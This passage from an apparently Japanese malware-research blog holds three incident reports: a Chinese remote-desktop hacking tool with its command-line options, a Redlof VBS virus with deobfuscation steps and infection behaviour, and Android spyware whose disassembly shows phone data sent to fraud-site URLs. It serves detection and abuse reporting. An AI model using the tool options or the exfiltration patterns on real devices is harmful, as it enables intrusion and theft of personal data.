2. Using Packer/Compiler: Microsoft Visual C++ v6.0
3. Registry Malicious Operation Traces Found:
   (レジストリー変更・削除動き)
   OriginalFirstThunk:            0x64CC
   Characteristics:               0x64CC
   TimeDateStamp:                 0x0   
   ForwarderChain:                0x0   
   Name:                          0x65E2
   FirstThunk:                    0x6000

   ADVAPI32.dll.RegDeleteValueA Hint[472]
   ADVAPI32.dll.RegCloseKey Hint[459]
   ADVAPI32.dll.RegEnumValueA Hint[481]
   ADVAPI32.dll.RegOpenKeyExA Hint[492]

4. Other Malicious Traces:
   (発見したあやしい動きのコード)
   OriginalFirstThunk:            0x64E0 
   Characteristics:               0x64E0 
   TimeDateStamp:                 0x0    
   ForwarderChain:                0x0    
   Name:                          0x6594 
   FirstThunk:                    0x6014 

   0x406020 GetCurrentProcess
   0x4060a0 GetProcAddress
   0x4060a4 LoadLibraryA
   0x4060ac CloseHandle
   0x406058 HeapCreate
   0x406060 VirtualAlloc
行動分析調査↓
1. Depends on the command line, process can be instantly ended (exit 0) or daemonized.
2. Without parameter it will runs stdout/screen output;
   ==================================================
   ......3389................
   ......MSN:pt007@vip.sina.com
   QQ....7491805
   ..............pt007..........................!
   ....:  clear3389 -h
         "clear3389 -h" //........
         "clear3389 -a" //........3389............
         "clear3389 -d MRU9" //..........3389........
   ==================================================
   ↑間違いなく中国語で、中国で作った物ですね。
   Snapshot:
   
    Is in chinese.

3. If executed by the below command line:
   下記のコマンドで実行したポート3389が開いてマルウェアのプロセスが残っています。
   リモートデスクトップと同じプロトコルの動きがあると確認しました。
   clear3389.exe -d mru9
   clear3389.exe -d mru8
   clear3389.exe -d mru7
   It will run as daemon and opening 3389 to a specific site:
   
マルウェア情報調査↓
1. インターネットで検索したら沢山結果が出て来ました↓
   
   ↑沢山結果が出ました。中国で結構使われているハッキングソフトです。
    一つのページには使い方が書いてあります↓
    
    ↑レヒストリを変更する事、マイドキュメントにDefault.rdpファイルを作る事が
     本マルウェアの条件、そのファイルをちゃんと設定すれば大変なハッキング仕組みを
     作る可能性が高いです。
■感染されたサイトの情報と連絡先↓

IP登録情報↓
a. [IPネットワークアドレス]     106.187.40.0/21
b. [ネットワーク名]             LINODE
f. [組織名]                     Linode, LLC
g. [Organization]               Linode, LLC
m. [管理者連絡窓口]             KB2156JP
n. [技術連絡担当者]             KB2156JP
p. [ネームサーバ]               ns1.linode.com
p. [ネームサーバ]               ns2.linode.com
p. [ネームサーバ]               ns3.linode.com
p. [ネームサーバ]               ns4.linode.com
p. [ネームサーバ]               ns5.linode.com
[割当年月日]                    2011/07/14
[返却年月日]                    
[最終更新]                      2011/08/11 09:59:04(JST)
上位情報
----------
KDDI株式会社 (KDDI CORPORATION)
[割り振り]                      106.128.0.0/10

a. [JPNICハンドル]              KB2156JP
b. [氏名]                       Brett Kaplan
c. [Last, First]                Brett, Kaplan
d. [電子メイル]                 bKaplan@linode.com
f. [組織名]                     Linode, LLC
g. [Organization]               Linode, LLC
インターネット図↓
IPアドレスのASルーティング↓


マルウェアドメインのルーティング↓

----
ゼロデイ・ジャパン
http://0day.jp
マルウェア研究所
アドリアン・ヘンドリック
Sponsored by: 株式会社ケイエルジェイテック
Tweet

#OCJP-018： 日本のケーブルテレビネットワークにある（175.177.155.24）にRedlofのVBSウイルスに感染されました。

■下記のホスト/IP↓
home.catv.ne.jp / 175.177.155.24
■下記のURLに↓
hxxp://home.catv.ne.jp/nn/morigon/
■下記のマルウェアを発見しました↓
アファイル　　：「index.html」
マルウェア種類： VB Scriptウイルス
マルウェア名　： VBS/Redlof.A 又は HTML/Redlof
マルウェア機能： ウイルス
説明　　　　　： 感染されたPCが色んなHTML/HTMファイルに感染動きを始めます
                 メールを送った時にウイルスのコードを添付されてます。
                 添付されたHTMLファイル/HTMLメールは感染原因です。
■ダウンロード証拠↓
--01:57:57--  hxxp://home.catv.ne.jp/nn/morigon/
           => `index.html'
Resolving home.catv.ne.jp... 175.177.155.24
Connecting to home.catv.ne.jp|175.177.155.24|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 12,069 (12K) [text/html]
100%[====================================>] 12,069        --.--K/s
01:57:57 (911.70 KB/s) - `index.html' saved [12069/12069]
■ウイルススキャン結果↓
File name:      index.html
MD5:            6e9f8d2a5d151e1cb1e78945b48c2369
File size:      11.8 KB ( 12069 bytes )
File type:      HTML
DetectionRatio: 37 / 42
Analysis date:  2012-02-17 17:45:57 UTC
Result:         [CLICK]
■マルウェア調査情報↓
マルウェアURLをダウンロードされたら普通のHTMLファイルが保存されます。
そのHTMLファイルのサイズとMD5が変わるかも知れないので、さっそく中身に調査しましょう。
本件の感染されたHTML中身は下記となります↓

見た目通りVB Scriptコードですね。
紫色がウイルスのコードで、隠した形です(Obfuscated)。
赤色がウイルスのAPPLETオブジェクトです。
仕組み的にはウイルスのコードを実行された時にアプレットをコールされます。

重要なのは隠したウイルスコードの分ですので、詳しく見ましょう。
先ずはSCRIPTの分だけ取りましょう↓

↑本件のマルウェア/ウイルスの隠したコードが長いです。
見ても分からないので、このSCRIPTを別のテキストファイルに保存して「1.VBS」のファイル名で保存しました。

↑このファイルには＜SCRIPT＞と＜/SCRIPT＞のタグを外して、最後の分がこんな感じになる↓

↑説明します。重要なのはexecuteコマンドです。２つがあります。
１）のexecuteコマンドをそのままにして下さい。
２）番目のexecuteコマンドから後で変更しましょう。
３）番目は重要なウイルスコマンド/プログラムのSTRING$となります。

プログラムのSTRING$を外に出したいので、上記のコード2番目のexecuteコマンドから、
下記のように変更しましょう↓

↑この意味は、ウイルスコードを1.outのファイルに全て洗い出します。

次は、Windowzzのcmd.exeを実行して下記のコマンドを書くと↓
wscript 1.vbs
1.outとのファイルが出来上がりました↓

↑ファイルの中身は本当のVB Scriptウイルスコマンドとなりますのでスナップショットはこんな感じ↓




↑これ普通に見えますので、
さくっと見たらレジストリーを弄る事、と、ファイルのやり取り動きを発見しました。
間違いなくマルウェアコードですので、詳しく調査が出来ます（＾＾v
※）ウイルスのコードを確認したいなら本件のVirusTotalのレポートをご覧下さい。
■マルウェアの調査結果↓
マルウェアの動き↓
本件のウイルスが実行されたらがCURRENT FOLDERにある.HTT*、.HTM、.JSP、.ASP、.PHPファイルを
開きます、それでCURRENT FOLDERの↓のフォルダーにも同じ動きをしました。
終わったら「マイドキュメント」のフォルダーとフォルダーの下にある同じファイルを探して開きます。
CURRENT FOLDERにFolder.httとC:\WinPath\Web\Folder.httファイルを作り、
元ファイルをWeb\KJWALL.GIF (Folder.HTT)とSystem32\KJWALL.GIF (DeskTop.INI)にバックアップする。
で、本マルウェアはニセKernel.dllとニセkernel32.dllファイルを作ります、中身はマルウェアコード。
そしてレジストリにDLLファイルの実行時に必ずWScriptで実行するの設定を変更、
これでWindowsが起動した時にニセkernel.dllを必ず実行されていて、そこから感染が始まります。
上記のコードに書いたように、本マルウェアもレジストリに書いたOutlookのキーを変更し、
毎回メールを送ると必ず本マルウェアのコードが添付されるように設定されそうです。
ExeStringのSTRING$にマルウェアの暗号キーが入っています。
感染されたらどうやって分かりますか？↓
1. もし感染されたら下記のファイルがPCに入っています↓
   C:\WINDOWS\WEB\KJWALL.GIF
   C:\WINDOWS\SYSTEM32\KJWALL.GIF
2. 確認の為に、ブランクHTMLファイルを作って頂いて、そのHTMLファイルを開いて下さい。
   それで何も書かずに保存して下さい。その時にもしHTMLファイルのサイズが増えるならそのPCが
   感染されました。
■感染されたサイトの情報↓
inetnum:        175.177.155.0 - 175.177.155.255
netname:        ITSCOM-NET
descr:          its communications Inc.
country:        JP
admin-c:        JP00013878
[グループハンドル]              JP00013878
[グループ名]                    IPネットワーク技術チーム
[Group Name]                    IP Network Technical Team
[電子メール]                    technical@itscom.ad.jp
[組織名]                        イッツ・コミュニケーションズ株式会社
[Organization]                  its communications Inc.
[部署]                          サービス本部　システムグループ
[Division]                      Service Division System Group
[電話番号]                      044-820-7546
[FAX番号]                       044-833-3400
[最終更新]                      2006/03/16 09:53:10(JST)
                                technical@itscom.ad.jp

a. [Domain Name]                CATV.NE.JP
d. [Network Service Name]       Cable Internet
l. [Organization Type]          Network Service
m. [Administrative Contact]     YK1978JP
n. [Technical Contact]          YK1978JP
p. [Name Server]                ns0.itscom.jp
p. [Name Server]                ns1.itscom.jp

a. [JPNICハンドル]              YK1978JP
b. [氏名]                       金子康行
c. [Last, First]                kaneko, yasuyuki
d. [電子メイル]                 yasuyuki@itscom.ad.jp
f. [組織名]                     イッツ・コミュニケーションズ株式会社
g. [Organization]               its communications Inc.
k. [部署]                       通信事業部 IPネットワーク技術課
l. [Division]                   IP Communications Department
m. [肩書]                       課長
n. [Title]                      Manager

----
ゼロデイ・ジャパン
http://0day.jp
マルウェア研究所
アドリアン・ヘンドリック
Sponsored by: 株式会社ケイエルジェイテック
Tweet

#OCJP-017： erotte.com（49.143.247.144）の架空請求詐欺のアンドロイド・マルウェアのアプリ発見！

このケースは「#OCJP-010 - bananaxxx.maido3.com（206.223.148.230）のアンドロイド・マルウェア発見！」 の続きですが、
同じマルウェアダウンロードサイトに新しい種類アンドロイドマルウェアを発見しましたので、別のレポートで報告させて頂きます。
本件のAndroidマルウェアは日本で作られたかと思われ、今回は日本にある架空請求詐欺サイトに連携があると確認しました。この件は犯罪かと思われ、きちんと対応をお願いしたいと思います。

さて、下記は本件のマルウェア説明となりす↓

■下記のサイトに↓
hxxp://www.14243444.com/appli02.php
hxxp://14243444.com/appli02.php
hxxp://206.223.148.230/~pj629g01/appli02.php
hxxp://banana8310.maido3.com/~pj629g01/appli02.php
hxxp://banana3247.maido3.com/~pj629g01/appli02.php
■下記のAndroidマルウェアが発見されました↓
アファイル　　：「sp_k_test.apk」
マルウェア種類： スパイウェア
マルウェア名　： Android/Application/Spyware/FakeTimer
マルウェア機能： (Spyware)機能
説明　　　　　： 感染されたAndroidスマートフォンの情報を外に送る可能性ふぁある(Spyware)
■ウイルススキャン結果↓
MD5:        079b92df0da0e57c3dfcd5b8d0d2c82c
File size:    78.2 KB ( 80119 bytes )
File name:    sp_k_test.apk
File type:    ZIP
DetectRatio:  6 / 43
AnalysisDate: 2012-02-16 21:07:55 UTC 
Resut:        [CLICK]
■マルウェア情報
マルウェアのURLをクリックしたらAPKアプリインストーラーがダウンロードされます。
パソコンでダウンロードしたら何も起きないと思いますが、
Androidでダウンロードしたら、本マルウェアがインストールされる可能性があります。
インストールしたら見た目はアダルトビデオ関係のアプリアプリーと思われますが、
実は裏動きもありますので、Androidモバイルの情報を全てをアダルトサイトに送る事となります。

インストーラーはパソコンで見るとこんな感じです↓


現在ダウンロードが出来ている状況です、下記はダウンロード証拠となります↓
--14:23:35--  hxxp://14243444.com/appli02.php
           => `appli02.php'
Resolving 14243444.com... 206.223.148.230
Connecting to 14243444.com|206.223.148.230|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 80,119 (78K) [application/vnd.android.package-archive]
100%[===================================> ] 80,119       136.79K/s
14:23:36 (136.17 KB/s) - `appli02.php' saved [80119/80119]
ダウンロードした時のHTTPトラフィック↓
hxxp://14243444.com/appli02.php
GET /appli02.php HTTP/1.1
Host: 14243444.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:10.0.1) Gecko/20100101 Firefox/10.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ja,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive

HTTP/1.1 200 OK
Date: Fri, 17 Feb 2012 05:24:57 GMT
Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/0.9.8q PHP/5.3.8 mod_antiloris/0.4
X-Powered-By: PHP/5.3.8
Content-Disposition: attachment; filename=sp/k_test.apk
Content-Length: 80119
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: application/vnd.android.package-archive
パソコンで見たらファイルの情報は下記の様にです↓


APKインストーラーの中身はこんな感じ↓で、このベースでDISASSEMBLYをしました。


これからマルウェアの動きの説明となります、
先ずはマルウェアが色んなAndroidモバイルの個人情報を取られます。証拠↓

Androidアカウント情報を取られます↓
Main(373): invoke-static {p0}, ->get(Landroid/content/Context;)Landroid/accounts/AccountManager;
Main(379): invoke-virtual {v7} ->getAccounts()[Landroid/accounts/Account;
vew2(186): invoke-static {v0}, ->get(Landroid/content/Context;)Landroid/accounts/AccountManager;
vew2(192): invoke-virtual {v7} ->getAccounts()[Landroid/accounts/Account;

Androidメールアドレス情報を取られます↓
Main(550): const-string v3, "&m_addr="
vew2(385): const-string v3, "&m_addr="

Android電話番号情報を取られます↓
KitchenTimerService(25): .field private telno:Ljava/lang/String;
KitchenTimerService(48):     iput-object v0, p0, ->telno:Ljava/lang/String;
Main(42): .field private telno:Ljava/lang/String;
Main(98): iput-object v0, p0, Lcom/example/android/service/Main;->telno:Ljava/lang/String;
Main(402):iput-object v0, p0, Lcom/example/android/service/Main;->telno:Ljava/lang/String;
Main(538):const-string v3, "&telno="
Main(544):iget-object v3, p0, Lcom/example/android/service/Main;->telno:Ljava/lang/String;
vew2(26): .field private telno:Ljava/lang/String;
vew2(57): iput-object v0, p0, Lcom/example/android/service/vew2;->telno:Ljava/lang/String;
vew2(215):iput-object v0, p0, Lcom/example/android/service/vew2;->telno:Ljava/lang/String;
vew2(373): const-string v3, "&telno="
vew2(379):iget-object v3, p0, Lcom/example/android/service/vew2;->telno:Ljava/lang/String;

Androidシステム情報を取られます↓
Main(167): invoke-virtual {p0, v3}, Lcom/example/android/service/Main;->getSystemService
Main(332): invoke-virtual {p0, v0}, Lcom/example/android/service/Main;->getSystemService
Main(343): invoke-virtual {p0, v0}, Lcom/example/android/service/Main;->getSystemService
Main(365): invoke-virtual {p0, v0}, Lcom/example/android/service/Main;->getSystemService
vew2(107): invoke-virtual {p0, v3}, Lcom/example/android/service/vew2;->getSystemService
vew2(174): invoke-virtual {p0, v0}, Lcom/example/android/service/vew2;->getSystemService
vew2(227): invoke-virtual {p0, v0}, Lcom/example/android/service/vew2;->getSystemService
vew2(238): invoke-virtual {p0, v0}, Lcom/example/android/service/vew2;->getSystemService

組み合わせ全て情報を纏められました↓

電話番号、メールアドレス、SSIDの盛り合わせて↓


GPSロケーションの情報↓


外にあるサイトに送信させる↓


外に送る動きの証拠↓
KitchenTimerService$1:  const-string v4, "hxxp://erotte.com/check.php?id="
Main$2.smali(67):       const-string v3, "hxxp://erotte.com/rgst5.php?gpsx="
vew2$1.smali(67):       const-string v3, "hxxp://erotte.com/rgst5.php?gpsx="
vew2(363):              const-string v3, "hxxp://erotte.com/send.php?a_id="
Main(528):              const-string v3, "hxxp://erotte.com/send.php?a_id="

上記のURLを開いたら下記のページを発見しました↓



↑間違いなく、本件のアプリは架空請求詐欺のアプリです！
■詳しく詐欺サイトのIP/ドメインを調べたら、何処にあるのか分かります↓
$ date
Fri Feb 17 16:09:26 JST 2012

$ host -ta erotte.com
erotte.com has address 49.143.247.144

データセンター情報↓
ASNo:    18068
PREFIX:  49.143.240.0/21
AS Name: ACROSS
Country: JP
Domain:  ACROSS.OR.JP
ISP:     DREAMWAVE SHIZUOKA CO. LTD
ドメイン情報↓
Domain Name: EROTTE.COM
Registrar: GMO INTERNET, INC. DBA ONAMAE.COM
Whois Server: whois.discount-domain.com
Referral URL: http://www.onamae.com
Name Server: 01.DNSV.JP
Name Server: 02.DNSV.JP
Registrant Name: Whois Protect Service
Registrant Organization: GMO Internet Inc.
Registrant Street1: 26-1 Sakuragaoka-cho
Registrant Street2: Cerulean Tower 11F
Registrant City: Shibuya-ku
Registrant State: Tokyo
Registrant Postal Code: 150-8512
Registrant Country: JP
Registrant Phone: 03-0364-8727
Registrant Email: admin@onamae.com
↑お名前.COMで作ったドメインですね…
IP/サーバの情報↓
inetnum:        49.143.240.0 - 49.143.247.255
netname:        Hypernet-Shizuoka
descr:          Dreamwave Shizuoka Co., Ltd.
descr:          SuzuyoInformation Bldg. 1F,
descr:          22-1-5,Nakanogo,Shimizu-ku,Shizuoka-shi,Shizuoka,JAPAN
country:        JP
inetnum:        49.143.247.128 - 49.143.247.191
netname:        UPRIGHT
descr:          Upright Inc.
country:        JP
admin-c:        TY9472JP
tech-c:         KA4923JP
a. [JPNICハンドル]              TY9472JP
b. [氏名]                       谷 佑
c. [Last, First]                Yu, Tani
d. [電子メイル]             tani@upr.ight.jp
f. [組織名]                     株式会社アップライト
g. [Organization]               Upright Inc.

a. [JPNICハンドル]              KA4923JP
b. [氏名]                       上倉 亨
c. [Last, First]                Akira, Kamikura
d. [電子メイル]             kamikura@upr.ight.jp
f. [組織名]                     株式会社アップライト
g. [Organization]               Upright Inc.

PS: With special thank's to Mr. Kawakami for informing #OCJP!
----
ゼロデイ・ジャパン
http://0day.jp
マルウェア研究所
アドリアン・ヘンドリック
Sponsored by: 株式会社ケイエルジェイテック
Tweet